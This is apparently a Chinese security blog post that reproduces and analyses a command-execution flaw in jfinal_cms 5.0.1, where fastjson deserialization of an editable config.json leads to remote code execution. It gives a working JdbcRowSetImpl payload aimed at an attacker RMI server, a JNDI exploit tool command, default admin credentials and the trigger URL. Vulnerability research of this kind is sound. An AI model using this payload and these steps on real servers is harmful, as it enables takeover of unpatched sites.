学习
实践
活动
专区
工具
TVP
写文章
专栏首页用砖头敲代码Jfinal CMS命令注入漏洞

Jfinal CMS命令注入漏洞

漏洞环境

jfinal_cms 5.0.1 中存在命令执行漏洞

JDK 版本要求:

  • 基于 RMI<=6u141、7u131、8u121 使用的 JDK 版本
  • 基于 LDAP<=6u211、7u201、8u191 使用的 JDK 版本。

jfinal_cms版本:5.0.1 fastjson版本:1.2.28

漏洞复用

测试中使用的JDK版本:JDK8u101

在 kali 上运行该工具,启动 rmi 和 ldap 服务 https://github.com/feihong-cs/JNDIExploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

替换payload中的rmi或ldap地址,然后保存到config.json

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.248.128:1099/6dxg2x",
        "autoCommit":true
    }
}

登录后台,找到模板管理,后台默认账号密码admin/admin123456

找到config.json并点击,之后点replace file

把刚才做好的payload上传

访问 /ueditor,就会执行命令并弹出计算器

http://localhost:8080/jfinal_cms/ueditor

利用成功,散会!

漏洞分析

com.jflyfox.component.controller.Ueditor ActionEnter类在/ueditor路由的index方法中实例化

com.baidu.ueditor.ActionEnter

ActionEnter类的构造方法中实例化

com.baidu.ueditor.ConfigManager

ConfigManager调用的构造方法initEnv()

com.baidu.ueditor.ConfigManager

initEnv调用JSONObject.parseObject来解析文件内容,这里的文件内容是可控的,只需将文件内容替换为payload即可

com.baidu.ueditor.ConfigManager

如果后台存在任何文件上传漏洞,则可以将此文件替换为包含payload的文件,以触发 fastjson 反序列化WEB-INF/classes/config.json

本文参与 腾讯云自媒体分享计划 ,欢迎热爱写作的你一起参与!
本文分享自作者个人站点/博客:https://www.moleft.cn复制
如有侵权,请联系 cloudcommunity@tencent.com 删除。
登录 后参与评论
0 条评论

相关文章

  • Total.js CMS 命令注入漏洞复现

    Total.js CMS 12.0.0版本中存在命令注入漏洞,攻击者可利用该漏洞执行非法命令。

    墙角睡大觉
  • CMS漏洞之ZZCMS v8.2最新SQL注入漏洞

    CMS漏洞之ZZCMS v8.2最新SQL注入漏洞 时间概述 近期在一直都在审核CMS漏洞,连续数日,一无所获,甚是无聊,略有些许焦躁。 暮然回首,桌角横...

    C4rpeDime
  • 意外发现一套cms的注入漏洞

    事情是这样的某一天在一个安全交流群里聊天,一个朋友说他们老师叫他去检测下他们学校官网,后来朋友他找到了我让我帮助他进行安全检测。

    ittongluren
  • 国外某CMS注入漏洞简单分析附payload

    最近在某个平台上把17年所有的CVE详细信息都爬下来了,一个文档34M多,放星球上了。也想借此机会做一个漏洞库,长期做下去,欢迎有志同道合,有分享精神的的伙伴一...

    用户5878089
  • Apache Tika命令注入漏洞挖掘

    这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤。CVE是https://nvd.nist.gov/vuln/detail/CVE-2...

    FB客服
  • 利用织梦CMS0day注入漏洞渗透测试

    网上已经有几篇这样的文章了,当然我也是汇总了一些方法,并非原创。这个0day注入漏洞是1月份爆出来的,立马有人写出了利用方法。当然,渗透之路并非一番风顺,ded...

    phith0n
  • 常见的Web漏洞之命令注入

    本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果...

    网络安全自修室
  • 漏洞|74cms 3.6 前台SQL注入+Python脚本小练习

    最近有个74cms v4.2.3任意文件下载的漏洞,本来想试着和74cms 3.6 前台SQL注入漏洞结合下然后取出QS_pwdhash的值进行MD5碰撞,可...

    漏斗社区
  • OpenSSH 命令注入漏洞(CVE-2020-15778)

    OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有...

    一觉睡到小时候
  • CVE-2020-15778:OpenSSH命令注入漏洞复现

    OpenSSH是SSH(Secure SHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。...

    Timeline Sec
  • git-interface@2.1.1 中的命令注入漏洞

    git-interface将自己描述为与 node.js 中的 git 存储库一起使用的接口

    洛米唯熊
  • OpenSSH命令注入漏洞复现(CVE-2020-15778)

    OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项...

    谢公子
  • CMS Made Simple 注入漏洞(CVE-2019-9053)分析复现附利用POC

    刚好前一段时间分析了这个cms的一个插件showtime的一个任意文件上传漏洞,大家还可以在从往期的文章中找到这漏洞链接如下

    用户5878089
  • TP-Link路由器命令注入漏洞分析

    TP-Link TL-WVR等都是中国普联(TP-LINK)公司的无线路由器产品。

    C4rpeDime
  • CVE-2022-24288:Apache Airflow OS命令注入漏洞

    0x01 简介Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。...

    C4rpeDime
  • CVE-2022-24288:Apache Airflow OS命令注入漏洞

    Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。

    Timeline Sec
  • CA3006:查看进程命令注入漏洞的代码

    处理不受信任的输入时,请注意防范命令注入攻击。 命令注入攻击可在基础操作系统上执行恶意命令,从而降低服务器的安全和完整性。

    呆呆
  • CVE-2018-1335 Apache Tika 命令注入漏洞复现

    本文将介绍的是Apache tika-server命令注入漏洞到实现攻击的一系列步骤。该漏洞编号为CVE-2018-1335。

    墙角睡大觉
  • Apache Solr Velocity模版注入远程命令执行漏洞复线

    Apache Solr 是一个开源的搜索服务器。Solr使用Java语言开发,主要基于HTTP和ApacheLucene 实现。原理大致是文档通过Http利用X...

    墙角睡大觉

作者介绍

MoLeft

黑龙江码哆科技有限公司Java后端工程师

黑龙江码哆科技有限公司 · Java后端工程师 (已认证)

专栏

精选专题

活动推荐

关注

腾讯云开发者公众号
10元无门槛代金券
洞察腾讯核心技术
剖析业界实践案例
腾讯云开发者公众号二维码

扫码关注腾讯云开发者

领取腾讯云代金券